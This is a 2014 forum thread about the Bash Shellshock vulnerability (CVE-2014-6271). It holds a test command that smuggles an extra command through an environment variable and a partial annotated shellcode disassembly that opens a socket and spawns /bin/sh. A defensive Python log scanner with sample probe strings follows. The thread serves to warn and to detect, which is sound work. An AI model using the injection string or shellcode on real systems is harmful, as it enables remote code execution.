CVE-2014-6271

T
Techtronic
Mindaugas N.
  • 25 Sep '14

Let's hurry up and update; Debian, Ubuntu and RHEL already have updates.

Test:

sh-4.2$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test
sh-4.2$

After the update:

sh-4.2$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test
sh-4.2$

http://web.nvd.nist.gov/view/vuln/detai ... -2014-6271
https://lists.debian.org/debian-securit ... 00220.html
http://lists.centos.org/pipermail/cento ... 46099.html

W
  • 26 Sep '14

Can anyone explain whether this bug would affect, say, all those wireless routers that most likely don't get updated? As I understand it, the question may be rhetorical.

But anyway, it's an interesting bug that is ~20 years old.

T
Techtronic
Mindaugas N.
  • 26 Sep '14

Well, experts say that the bash bug is scarier than the Heartbleed bug.
If it is possible to connect to those routers, and they use, say, CGI (a web control panel), then of course they are vulnerable.

Exploits have already started

.....
0x08048059    43           inc ebx  // = "SYS_SOCKET" = "socket" ()
0x0804805a    53           push ebx  // Build arg array for INET { protocol = 0, push BYTE 0x1 ; (in reverse) SOCK_STREAM = 1, push BYTE 0x2 ; AF_INET = 2 }
0x0804805b    6a02         push 0x2  // 0x00000002 = "PF_INET"
.....
0x08048083    52           push edx ; push null string termination
0x08048084    682f2f7368   push 0x68732f2f ; // push "//sh" to the stack
0x08048089    682f62696e   push 0x6e69622f ; //push "/bin" to the stack
0x0804808e    89e3         mov ebx, esp // addr of "/bin//sh" into ebx via esp
0x08048090    52           push edx // push x32 null terminator to stack
0x08048091    53           push ebx // push string address to stack up from null terminator point
0x08048092    89e1         mov ecx, esp // arg array with string ptr
0x08048094    b00b         mov al, 0xb
0x08048096    cd80         int 0x80 // execve("/bin//sh", ["/bin//sh", NULL], [NULL])
T
Techtronic
Mindaugas N.
  • 27 Sep '14

https://shellshocker.net/

As I understand it, there is still no official patch, which is sad. Botnet attacks have already started too.
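
A defender-side check for the CGI exposure discussed in this thread, added here as an example and not part of any post: CGI hands request headers to the script as environment variables, so this scans web access log lines for the `() {` function-definition prefix used in the test above. The Combined Log Format, the sample lines and the function name are assumptions constructed for illustration.

```python
import re

# Bash treats an environment value as a function definition when it begins
# with "() {"; CVE-2014-6271 is the execution of whatever follows the body.
FUNC_PREFIX = re.compile(r"\(\)\s*\{")

# Assumed format (Combined Log Format):
# ip ident user [time] "request" status bytes "referer" "user-agent"
QUOTED = r'(?:[^"\\]|\\.)*'  # quoted field, tolerating backslash-escaped quotes
LOG_LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>' + QUOTED + r')" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>' + QUOTED + r')" "(?P<agent>' + QUOTED + r')"'
)


def find_shellshock_probes(lines):
    """Return (ip, path, field) for each logged request field that carries
    a bash function-definition prefix."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not in the assumed log format, skip it
        parts = m.group("request").split(" ")
        path = parts[1] if len(parts) > 1 else ""
        for field in ("request", "referer", "agent"):
            if FUNC_PREFIX.search(m.group(field)):
                hits.append((m.group("ip"), path, field))
    return hits


# Constructed sample lines: documentation IP ranges and the harmless echo
# string from the test in the first post.
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Sep/2014:10:01:02 +0300] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [26/Sep/2014:10:01:05 +0300] "GET /cgi-bin/status HTTP/1.1" 200 87 "-" "() { :;}; echo vulnerable"',
    '203.0.113.4 - - [26/Sep/2014:10:02:11 +0300] "GET /cgi-bin/admin.cgi HTTP/1.0" 404 209 "() { :; }; echo vulnerable" "curl/7.35"',
    "not a log line",
]

if __name__ == "__main__":
    for ip, path, field in find_shellshock_probes(SAMPLE_LOG):
        print(f"{ip} sent a function-definition string in {field} to {path}")
```

A hit only shows that a request carried the string; whether the host ran it depends on the bash version, which the test in the first post checks.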